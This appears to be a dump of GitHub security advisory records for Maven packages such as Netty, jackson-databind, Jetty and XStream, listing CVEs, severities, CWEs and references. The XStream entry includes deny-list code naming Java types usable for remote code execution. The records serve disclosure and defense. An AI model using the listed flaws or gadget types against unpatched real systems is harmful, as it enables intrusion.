Non-constant-time comparison of CSRF tokens in endpoint request handler in `com.vaadin:flow-server` versions 3.0.0 through 5.0.3 (Vaadin 15.0.0 through 18.0.6), and com.vaadin:fusion-endpoint version 6.0.0 (Vaadin 19.0.0) allows attacker to guess a security token for Fusion endpoints via timing attack. - https://vaadin.com/security/cve-2021-31406
{'CVE-2021-31406'}
2022-03-03T05:13:32.337447Z
2021-04-19T14:50:38Z
MODERATE
null
{'CWE-208', 'CWE-203'}
{'https://vaadin.com/security/cve-2021-31406', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31406', 'https://github.com/vaadin/flow/security/advisories/GHSA-p7jq-v8jp-j424', 'https://github.com/vaadin/flow/pull/10157'}
null
Maven
GHSA-p2v9-g2qv-p635
HTTP Request Smuggling in Netty
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.
{'CVE-2019-20445'}
2022-03-03T05:14:16.100150Z
2020-02-21T18:55:04Z
MODERATE
null
{'CWE-444'}
{'https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0806', 'https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E', 'https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0605', 'https://access.redhat.com/errata/RHSA-2020:0497', 'https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E', 'https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final', 'https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E', 'https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0811', 'https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E', 'https://github.com/netty/netty/pull/9865', 'https://access.redhat.com/errata/RHSA-2020:0606', 'https://github.com/netty/netty', 'https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E', 'https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html', 'https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html', 'https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E', 'https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E', 'https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E', 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E', 'https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E', 'https://usn.ubuntu.com/4532-1/', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0567', 'https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html', 'https://access.redhat.com/errata/RHSA-2020:0804', 'https://github.com/netty/netty/issues/9861', 'https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E', 'https://www.debian.org/security/2021/dsa-4885', 'https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/', 'https://access.redhat.com/errata/RHSA-2020:0805', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20445', 'https://access.redhat.com/errata/RHSA-2020:0601'}
null
Maven
GHSA-mh27-rxmr-8q4c
Cross-site Scripting in Jenkins SiteMonitor Plugin
Jenkins SiteMonitor Plugin 0.6 and earlier does not escape URLs of sites to monitor in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.
{'CVE-2022-28153'}
2022-04-07T22:02:00.236711Z
2022-03-30T00:00:23Z
MODERATE
null
{'CWE-79'}
{'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1932', 'http://www.openwall.com/lists/oss-security/2022/03/29/1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28153', 'https://github.com/jenkinsci/sitemonitor-plugin'}
null
Maven
GHSA-85cw-hj65-qqv9
Polymorphic Typing issue in FasterXML jackson-databind
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540.
{'CVE-2019-16335'}
2022-03-03T05:14:16.323950Z
2019-09-23T18:33:45Z
CRITICAL
null
{'CWE-502'}
{'https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0160', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0729', 'https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191004-0002/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16335', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43/', 'https://www.debian.org/security/2019/dsa-4542', 'https://access.redhat.com/errata/RHSA-2020:0159', 'https://access.redhat.com/errata/RHSA-2020:0161', 'https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:3200', 'https://access.redhat.com/errata/RHSA-2020:0164', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/FasterXML/jackson-databind/issues/2449', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT/', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0445', 'https://seclists.org/bugtraq/2019/Oct/6', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
Maven
GHSA-p6j8-hgv5-m35g
Uncontrolled Resource Consumption in jboss-remoting
A flaw was found in jboss-remoting in versions before 5.0.20.SP1-redhat-00001. A malicious attacker could cause threads to hold up forever in the EJB server by writing a sequence of bytes corresponding to the expected messages of a successful EJB client request, but omitting the ACK messages, or just tamper with jboss-remoting code, deleting the lines that send the ACK message from the EJB client code resulting in a denial of service. The highest threat from this vulnerability is to system availability.
{'CVE-2020-35510'}
2022-03-18T18:02:36.089450Z
2022-03-18T17:58:30Z
HIGH
null
{'CWE-400'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1905796', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35510'}
null
Maven
GHSA-9qcf-c26r-x5rf
XML external entity injection in Terracotta Quartz Scheduler
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.
{'CVE-2019-13990'}
2022-03-03T05:14:10.554139Z
2020-07-01T17:55:03Z
CRITICAL
null
{'CWE-611'}
{'https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949@%3Cdev.tomee.apache.org%3E', 'https://github.com/quartz-scheduler/quartz/pull/501', 'https://github.com/quartz-scheduler/quartz/issues/467', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82@%3Cdev.tomee.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGQUARTZSCHEDULER-461170', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/quartz-scheduler/quartz', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13990', 'https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa@%3Ccommits.tomee.apache.org%3E', 'https://github.com/quartz-scheduler/quartz/commit/13c1d45aa1db15d0fa0e4997139c99ba219be551', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf@%3Ccommits.tomee.apache.org%3E'}
null
Maven
GHSA-88cc-g835-76rp
Improper Restriction of XML External Entity Reference
PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.
{'CVE-2020-13692'}
2022-03-03T05:13:49.071925Z
2022-02-10T00:30:07Z
HIGH
null
{'CWE-611'}
{'https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.13', 'https://lists.apache.org/thread.html/r01ae1b3d981cf2e563e9b5b0a6ea54fb3cac8e9a0512ee5269e3420e@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/rfe363bf3a46d440ad57fd05c0e313025c7218364bbdc5fd8622ea7ae@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/r0478a1aa9ae0dbd79d8f7b38d0d93fa933ac232e2b430b6f31a103c0@%3Ccommits.camel.apache.org%3E', 'https://github.com/pgjdbc/pgjdbc/commit/14b62aca4764d496813f55a43d050b017e01eb65', 'https://lists.apache.org/thread.html/r631f967db6260d6178740a3314a35d9421facd8212e62320275fa78e@%3Ccommits.camel.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCCAPM6FSNOC272DLSNQ6YHXS3OMHGJC/', 'https://security.netapp.com/advisory/ntap-20200619-0005/', 'https://lists.apache.org/thread.html/rb89f92aba44f524d5c270e0c44ca7aec4704691c37fe106cf73ec977@%3Cnotifications.netbeans.apache.org%3E', 'https://lists.apache.org/thread.html/r4bdea189c9991aae7a929d28f575ec46e49ed3d68fa5235825f38a4f@%3Cnotifications.netbeans.apache.org%3E', 'https://lists.apache.org/thread.html/r00bcc6b2da972e0d6332a4ebc7807e17305d8b8e7fb2ae63d2a3cbfb@%3Ccommits.camel.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13692', 'https://lists.apache.org/thread.html/r7f6d019839df17646ffd0046a99146cacf40492a6c92078f65fd32e0@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/r1aae77706aab7d89b4fe19be468fc3c73e9cc84ff79cc2c3bd07c05a@%3Ccommits.camel.apache.org%3E'}
null
Maven
GHSA-j6qj-j888-vvgq
Directory exposure in jetty
### Impact If the `${jetty.base}` directory or the `${jetty.base}/webapps` directory is a symlink (soft link in Linux), the contents of the `${jetty.base}/webapps` directory may be deployed as a static web application, exposing the content of the directory for download. For example, the problem manifests in the following `${jetty.base}`: ```$ tree demo-base/ demo-base/ ├── etc ├── lib ├── resources ├── start.d ├── deploy │   └── async-rest.war └── webapps -> deploy ``` ### Workarounds Do not use a symlink
{'CVE-2021-28163'}
2022-04-22T16:02:00.234470Z
2021-04-06T17:32:00Z
LOW
null
{'CWE-200', 'CWE-59'}
{'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r787e47297a614b05b99d01b04c8a1d6c0cafb480c9cb7c624a6b8fc3@%3Cissues.solr.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GGNKXBNRRCZTGGXPIX3VBWCF2SAM3DWS/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5CXQIJVYU4R3JL6LSPXQ5GIV7WLLA7PI/', 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HAAKW7S66TECXGJZWB3ZFGOQAK34IYHF/', 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28163', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210611-0006/', 'https://github.com/eclipse/jetty.project', 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}
null
Maven
GHSA-45h5-r968-5xr7
Exposure of sensitive information in Elasticsearch
A flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view.
{'CVE-2021-22147'}
2022-03-03T05:13:41.078482Z
2021-09-20T20:29:40Z
MODERATE
null
{'CWE-732'}
{'https://www.elastic.co/community/security/', 'https://discuss.elastic.co/t/elastic-stack-7-14-0-security-update/280344', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22147', 'https://security.netapp.com/advisory/ntap-20211008-0002/'}
null
Maven
GHSA-vwx4-frpr-w27j
Improper Synchronization in Jenkins Convertigo Mobile Platform Plugin
Jenkins Convertigo Mobile Platform Plugin 1.1 and earlier uses static fields to store job configuration information, allowing attackers with Item/Configure permission to capture passwords of the jobs that will be configured.
{'CVE-2022-25210'}
2022-02-24T17:41:42Z
2022-02-16T00:01:14Z
MODERATE
null
{'CWE-662', 'CWE-820'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-25210', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2280', 'https://github.com/convertigo/Jenkins-plugin'}
null
Maven
GHSA-4gf2-xv97-63m2
Exposure of Sensitive Information in keycloak
A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events.
{'CVE-2020-1744'}
2022-03-03T05:13:09.245997Z
2021-09-20T20:43:24Z
MODERATE
null
{'CWE-755', 'CWE-200'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1744', 'https://access.redhat.com/security/cve/CVE-2020-1744', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1744', 'https://github.com/keycloak/keycloak'}
null
Maven
GHSA-45vg-2v73-vm62
Moderate severity vulnerability that affects org.springframework:spring-core
The Java SockJS client in Pivotal Spring Framework 4.1.x before 4.1.5 generates predictable session ids, which allows remote attackers to send messages to other sessions via unspecified vectors.
{'CVE-2015-0201'}
2022-03-03T05:13:59.085885Z
2018-10-17T20:28:20Z
MODERATE
null
null
{'https://github.com/advisories/GHSA-45vg-2v73-vm62', 'https://pivotal.io/security/cve-2015-0201', 'https://nvd.nist.gov/vuln/detail/CVE-2015-0201'}
null
Maven
GHSA-8p83-68cw-943f
Apache Ignite communicates to an external PHP server where sensitive information is sent
Apache Ignite 1.0.0-RC3 to 2.0 uses an update notifier component to update the users about new project releases that include additional functionality, bug fixes and performance improvements. To do that the component communicates to an external PHP server (http://ignite.run) where it needs to send some system properties like Apache Ignite or Java version. Some of the properties might contain user sensitive information.
{'CVE-2017-7686'}
2022-04-26T19:15:47.503436Z
2018-10-16T20:53:20Z
HIGH
null
{'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-7686', 'https://github.com/advisories/GHSA-8p83-68cw-943f', 'http://www.securityfocus.com/bid/99292', 'http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2017-7686-Apache-Ignite-Information-Disclosure-td19168.html'}
null
Maven
GHSA-2vxm-vp4c-fjfw
Authentication Bypass in Apache Cassandra
Apache Cassandra versions 2.1.0 to 2.1.22, 2.2.0 to 2.2.19, 3.0.0 to 3.0.23, and 3.11.0 to 3.11.9, when using 'dc' or 'rack' internode_encryption setting, allows both encrypted and unencrypted internode connections. A misconfigured node or a malicious user can use the unencrypted connection despite not being in the same rack or dc, and bypass mutual TLS requirement.
{'CVE-2020-17516'}
2022-03-03T05:13:53.814455Z
2022-02-09T01:01:22Z
HIGH
null
{'CWE-290'}
{'https://lists.apache.org/thread.html/r81243a412a37a22211754936a13856af07cc68a93d728c52807486e9@%3Ccommits.cassandra.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-17516', 'https://lists.apache.org/thread.html/rcb16f36cafa184dd159e94033f87d0fc274c4752d467f3a09f2ceae4@%3Ccommits.cassandra.apache.org%3E', 'http://mail-archives.apache.org/mod_mbox/cassandra-user/202102.mbox/%3c6E4340A5-D7BE-4D33-9EC5-3B505A626D8D@apache.org%3e', 'https://lists.apache.org/thread.html/rd84bec24907617bdb72f7ec907cd7437a0fd5a8886eb55aa84dd1eb8@%3Ccommits.cassandra.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210521-0002/'}
null
Maven
GHSA-gv5f-cjw9-5vxg
Camel-xstream component in Apache Camel can allow remote attackers to execute arbitrary commands
The camel-xstream component in Apache Camel before 2.15.5 and 2.16.x before 2.16.1 allow remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request.
{'CVE-2015-5344'}
2022-04-26T19:30:13.226588Z
2018-10-16T23:10:23Z
CRITICAL
null
null
{'https://github.com/advisories/GHSA-gv5f-cjw9-5vxg', 'https://lists.apache.org/thread.html/b4014ea7c5830ca1fc28edd5cafedfe93ad4af2d9e69c961c5def31d@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/2318d7f7d87724d8716cd650c21b31cb06e4d34f6d0f5ee42f28fdaf@%3Ccommits.camel.apache.org%3E', 'http://www.securityfocus.com/archive/1/537414/100/0/threaded', 'http://rhn.redhat.com/errata/RHSA-2016-2035.html', 'https://nvd.nist.gov/vuln/detail/CVE-2015-5344', 'http://www.securityfocus.com/bid/82260', 'http://camel.apache.org/security-advisories.data/CVE-2015-5344.txt.asc'}
null
Maven
GHSA-mw36-7c6c-q4q2
XStream can be used for Remote Code Execution
### Impact The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. ### Patches If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.14. ### Workarounds No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.13 or below who still want to use XStream default blacklist can use a workaround depending on their version in use. Users of XStream 1.4.13 can simply add two lines to XStream's setup code: ```Java xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); ``` Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _java.lang.Void_ and _void_. ```Java xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); ``` Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285: ```Java xstream.registerConverter(new Converter() { public boolean canConvert(Class type) { return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || Proxy.isProxy(type)); } public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { throw new ConversionException("Unsupported type due to security reasons."); } public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { throw new ConversionException("Unsupported type due to security reasons."); } }, XStream.PRIORITY_LOW); ``` ### Credits Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was supported by Zhihong Tian and Hui Lu, both from Guangzhou University. ### References See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2020-26217](https://x-stream.github.io/CVE-2020-26217.html). ### For more information If you have any questions or comments about this advisory: * Open an issue in [XStream](https://github.com/x-stream/xstream/issues) * Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
{'CVE-2020-26217'}
2022-04-25T23:17:04.652412Z
2020-11-16T20:07:59Z
HIGH
null
{'CWE-78'}
